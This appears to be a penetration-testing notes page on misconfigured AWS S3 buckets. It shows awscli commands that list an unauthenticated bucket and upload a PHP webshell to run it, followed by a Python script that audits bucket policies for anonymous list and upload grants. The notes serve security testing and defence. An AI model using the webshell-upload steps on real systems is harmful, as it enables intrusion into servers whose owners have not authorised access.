killchain-compendium/Exploits/Databases/S3.md

AWS S3 Buckets

  • awscli is the official tool

Configuration

  • An S3 bucket may not be configured to authenticate. awscli still expects credentials to be set, so the tool is configured with random credentials via aws configure

  • List the buckets on the endpoint via

aws --endpoint=http://s3.example.com s3 ls
2022-12-08 21:06:33 example.com

  • List the contents of the bucket afterwards, here named after the top level domain

aws --endpoint=http://s3.example.com s3 ls s3://example.com
2022-12-08 21:06:33          0 .htaccess
2022-12-08 21:06:33      1218 index.html

  • Upload a file (webshell) and execute it

aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com
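
The listing and upload above only work when the bucket grants those actions to anonymous callers. The following added example (not part of the original page) audits a bucket policy document for exactly those two grants; the sample policy and account ID are constructed, and it assumes the policy was exported beforehand, for instance with aws s3api get-bucket-policy.

```python
import fnmatch
import json

# Actions behind the two steps on this page: listing a bucket and uploading into it.
RISKY = {"s3:ListBucket": "anonymous listing", "s3:PutObject": "anonymous upload"}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    # "*" or {"AWS": "*"} (also as a list) means any caller, signed or not.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False

def audit_policy(policy_json):
    """Return sorted (sid, finding) pairs for unconditional anonymous grants."""
    findings = set()
    policy = json.loads(policy_json)
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Principal" not in stmt:
            continue
        if not _is_anonymous(stmt["Principal"]) or stmt.get("Condition"):
            continue  # conditional grants need manual review, not flagged here
        for pattern in _as_list(stmt.get("Action", [])):
            for action, label in RISKY.items():
                # IAM action matching is case-insensitive and supports * and ?
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    findings.add((stmt.get("Sid", "<no Sid>"), label))
    return sorted(findings)

# Constructed sample policy for the page's example bucket name.
SAMPLE = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicList", "Effect": "Allow", "Principal": "*",
         "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example.com"},
        {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:GetObject", "s3:Put*"],
         "Resource": "arn:aws:s3:::example.com/*"},
        {"Sid": "AdminOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example.com/*"},
    ],
})

if __name__ == "__main__":
    for sid, finding in audit_policy(SAMPLE):
        print(f"{sid}: {finding}")
```

Bucket and object ACLs, NotPrincipal and NotAction statements are outside what this check covers and need a separate review.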